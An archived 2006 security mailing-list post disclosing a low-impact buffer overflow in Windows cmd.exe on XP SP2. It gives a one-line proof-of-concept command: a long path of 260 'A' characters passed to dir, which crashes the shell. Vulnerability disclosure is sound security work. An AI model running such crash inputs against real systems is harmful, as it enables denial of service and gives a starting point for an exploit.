Windows Command Processor CMD.EXE Buffer Overflow
"gregory_panakkal" <[email protected]> Thu, 19 Oct 2006 09:03:26 +0530
| Newsgroups | gmane.comp.security.vulnerabilities |
|---|---|
| Message-ID | <[email protected]> |
Windows Command Processor CMD.EXE Buffer Overflow Tested on WinXP SP2 Impact - Very Low Copy-paste the following line in cmd.exe and execute it.. (it is a single command, has been split into multiple lines for readability sake). %COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" (260 characters of 'A's) DEP Comes into the picture. URL : http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html regards, Gregory Panakkal www.infogreg.com -- gregory_panakkal [email protected] -- http://www.fastmail.fm - I mean, what is it about a decent email service?